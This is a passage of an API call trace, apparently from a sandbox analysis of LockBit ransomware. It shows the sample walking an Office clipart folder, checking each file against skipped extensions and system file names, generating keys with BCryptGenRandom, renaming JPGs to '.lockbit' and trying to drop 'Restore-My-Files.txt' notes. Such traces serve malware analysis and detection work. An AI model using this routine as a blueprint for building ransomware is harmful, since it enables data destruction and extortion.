Office\\CLIPART\\PUB60COR") returned 1 [0159.106] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.106] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.107] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66188a70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x6873, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0341559.JPG", cAlternateFileName="")) returned 1 [0159.107] lstrcmpiW (lpString1=".", lpString2="J0341559.JPG") returned -1 [0159.107] lstrcmpiW (lpString1="..", lpString2="J0341559.JPG") returned -1 [0159.107] PathFindExtensionW (pszPath="J0341559.JPG") returned=".JPG" [0159.107] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.107] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.107] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.107] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.107] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.107] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.107] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.107] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.107] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.107] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.107] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.107] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.107] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.107] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.108] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.108] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.108] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.108] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.108] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.108] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.108] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.108] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.108] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.108] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.108] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.108] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.108] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.108] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.108] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.108] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.108] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.108] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.108] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.109] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.109] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.109] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.109] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.109] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.109] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.109] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.109] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.109] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.109] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.109] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.109] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.109] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.109] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.109] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0341559.JPG") returned 1 [0159.109] lstrcmpiW (lpString1="ntldr", lpString2="J0341559.JPG") returned 1 [0159.109] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0341559.JPG") returned 1 [0159.109] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0341559.JPG") returned -1 [0159.109] lstrcmpiW (lpString1="autorun.inf", lpString2="J0341559.JPG") returned -1 [0159.110] lstrcmpiW (lpString1="thumbs.db", lpString2="J0341559.JPG") returned 1 [0159.110] lstrcmpiW (lpString1="iconcache.db", lpString2="J0341559.JPG") returned -1 [0159.110] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.110] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341559.JPG") returned=".JPG" [0159.110] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.110] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.110] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.110] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.110] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.110] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.110] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.110] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.110] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.110] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.110] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.110] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.111] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.112] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.112] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.112] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.112] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.112] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.112] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.112] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.112] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.112] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.112] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.112] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.112] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.112] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.112] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.112] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.112] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341559.JPG.lockbit") returned 72 [0159.112] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341559.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341559.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0159.114] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.114] malloc (_Size=0x40068) returned 0x3f70048 [0159.114] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=26739) returned 1 [0159.114] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.114] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0159.115] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.115] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0159.115] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0159.132] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341559.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341559.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.132] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.132] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0159.132] free (_Block=0x1fa2ed8) [0159.132] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341559.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.132] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.133] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.133] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56772310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa497, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0341561.JPG", cAlternateFileName="")) returned 1 [0159.133] lstrcmpiW (lpString1=".", lpString2="J0341561.JPG") returned -1 [0159.133] lstrcmpiW (lpString1="..", lpString2="J0341561.JPG") returned -1 [0159.133] PathFindExtensionW (pszPath="J0341561.JPG") returned=".JPG" [0159.133] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.133] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.133] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.133] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.133] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.133] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.133] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.133] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.133] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.133] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.133] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.133] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.133] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.133] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.133] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.133] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.134] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.134] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.134] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.134] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.134] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.134] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.134] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.134] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.134] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.134] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.134] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.134] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.134] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.134] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.134] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.134] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.134] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.134] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.134] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.134] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.134] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.134] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.134] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.134] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.134] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.134] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.135] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.135] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.135] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.135] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.135] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.135] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0341561.JPG") returned 1 [0159.135] lstrcmpiW (lpString1="ntldr", lpString2="J0341561.JPG") returned 1 [0159.135] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0341561.JPG") returned 1 [0159.135] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0341561.JPG") returned -1 [0159.135] lstrcmpiW (lpString1="autorun.inf", lpString2="J0341561.JPG") returned -1 [0159.135] lstrcmpiW (lpString1="thumbs.db", lpString2="J0341561.JPG") returned 1 [0159.135] lstrcmpiW (lpString1="iconcache.db", lpString2="J0341561.JPG") returned -1 [0159.135] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.135] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341561.JPG") returned=".JPG" [0159.135] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.135] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.135] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.135] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.135] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.135] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.135] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.135] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.135] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.135] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.135] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.135] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.135] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.136] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.136] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.136] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.136] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.136] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.136] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.136] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.136] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.136] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.136] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.136] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.136] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.136] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.136] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.136] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.136] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341561.JPG.lockbit") returned 72 [0159.136] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341561.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341561.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0159.137] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.137] malloc (_Size=0x40068) returned 0x3df0008 [0159.137] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=42135) returned 1 [0159.137] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.138] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0159.138] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.139] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0159.139] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0159.172] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341561.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341561.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.172] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.172] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.173] free (_Block=0x1fa2ed8) [0159.173] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341561.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.173] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.173] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.173] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56772310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1e7b, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0341634.JPG", cAlternateFileName="")) returned 1 [0159.174] lstrcmpiW (lpString1=".", lpString2="J0341634.JPG") returned -1 [0159.174] lstrcmpiW (lpString1="..", lpString2="J0341634.JPG") returned -1 [0159.174] PathFindExtensionW (pszPath="J0341634.JPG") returned=".JPG" [0159.174] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.174] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.174] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.174] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.174] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.174] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.174] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.174] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.174] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.174] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.174] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.174] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.174] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.174] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.174] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.174] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.174] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.174] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.174] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.174] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.174] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.174] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.175] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.175] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.175] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.175] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.175] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.175] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.175] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.175] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.175] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.175] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.175] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.175] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.175] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.175] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.175] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.175] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.175] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.175] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.175] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.175] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.175] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.175] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.175] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.175] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.175] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.176] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0341634.JPG") returned 1 [0159.176] lstrcmpiW (lpString1="ntldr", lpString2="J0341634.JPG") returned 1 [0159.176] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0341634.JPG") returned 1 [0159.176] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0341634.JPG") returned -1 [0159.176] lstrcmpiW (lpString1="autorun.inf", lpString2="J0341634.JPG") returned -1 [0159.176] lstrcmpiW (lpString1="thumbs.db", lpString2="J0341634.JPG") returned 1 [0159.176] lstrcmpiW (lpString1="iconcache.db", lpString2="J0341634.JPG") returned -1 [0159.176] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.176] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341634.JPG") returned=".JPG" [0159.176] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.176] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.176] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.176] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.176] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.176] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.176] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.176] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.176] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.176] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.176] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.176] lstrcmpiW 